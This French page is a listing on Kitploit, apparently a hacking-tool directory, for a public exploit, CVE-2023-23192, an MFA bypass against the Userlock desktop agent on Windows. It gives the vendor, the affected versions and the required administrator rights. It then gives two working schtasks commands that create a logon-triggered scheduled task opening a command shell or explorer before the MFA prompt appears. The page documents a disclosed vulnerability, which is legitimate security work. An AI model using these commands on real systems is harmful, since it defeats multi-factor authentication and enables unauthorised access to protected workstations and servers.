Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23192 — CVE-2023-23192 | Kitploit
Outils/GitHubGitHub/pinarsadioglu/cve-2023-23192
Escalade de PrivilègesMécanismes de PersistanceAnalyse des VulnérabilitésExploitationTests d'IntrusionAuthentification
GitHubpinarsadioglu/cve-2023-23192

CVE-2023-23192

CVE-2023-23192

Voir le dépôt
133il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-23192

CVE-2023-23192- Userlock - Contournement de l'authentification multi-facteurs (MFA)

Titre de l'exploit : Userlock - Contournement de l'authentification multi-facteurs (MFA)

Date : 01/11/2023

Auteur de l'exploit : Pinar Sadioglu

Page d'accueil du fournisseur : https://www.isdecisions.com/products/userlock/help/#

Version : < = 11.0.1.40

Testé sur : Windows 10

Logiciel : Testé avec le 'Desktop agent' de Userlock pour protéger les sessions interactives sur les postes de travail ou sur les serveurs de terminaux.

CVE : CVE-2023-23192

MITRE ATT&CK : T1053.005 - Scheduled Task/Job: Scheduled Task

Autorisations requises : Administrateur, Root

https://nvd.nist.gov/vuln/detail/CVE-2023-23192

Description : Userlock est une solution d'authentification multi-facteurs pour Windows Active Directory et les environnements cloud afin d'empêcher tout accès non autorisé et indésirable. Il permet une authentification à deux facteurs (2FA) personnalisée lors de l'ouverture de session Windows, sur le Bureau à distance (RDP et RD Gateway), IIS, VPN et les applications cloud. Userlock vous permet de mettre en œuvre la MFA pour vos ouvertures de session Active Directory sur des postes de travail et serveurs membres d'un domaine. Une boîte de dialogue vous invite à saisir le code OTP, depuis l'application Authenticator, lors de la première ouverture de session de la journée sur votre poste de travail. Userlock s'intègre au processus d'ouverture de session pour fournir une authentification à deux facteurs.

L'une des stratégies les plus couramment exploitées par les acteurs de la menace pour établir une persistance sur l'ordinateur d'une victime est la planification des tâches. Les adversaires utilisent fréquemment cette stratégie pour échapper à la détection automatisée, maintenir leur persistance et mener des attaques surprises après de longues périodes de discrétion.

Vulnérabilité :

Créez une tâche planifiée qui s'exécute à l'ouverture de session de n'importe quel utilisateur.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

mfa

Après une ouverture de session réussie avec les informations d'identification du domaine, le cmd.exe planifié est exécuté et la boîte de dialogue MFA de Userlock s'affiche.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"
Télécharger l’outil